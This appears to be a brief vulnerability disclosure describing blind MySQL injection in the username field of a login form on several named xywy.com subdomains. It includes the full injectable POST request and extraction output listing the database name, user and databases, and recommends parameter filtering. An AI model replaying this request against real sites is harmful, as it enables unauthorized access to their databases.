MySQL blind injection for multiple sites
MySQL blind injection for multiple sites
Q & A: MySQL injection in the background of the background management system. Multiple similar domain names:
http://xunjian.club.xywy.comhttp://dangan.app.xywy.comhttp://mxunjian.club.xywy.com
Here is an example:
POST /login.php HTTP/1.1Content-Length: 229Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://mxunjian.club.xywy.comCookie: PHPSESSID=4fb914cabfac3d217c1b1070d4ef3e93Host: mxunjian.club.xywy.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*submit=%b5%c7%c2%bd&backurl=&code=1234&passwd=123456&phonenum=18888888888&username=*
Username can be injected.
current database: 'club'current user: '[email protected]'available databases [3]:[*] club[*] information_schema[*] test
Solution:
Parameter Filtering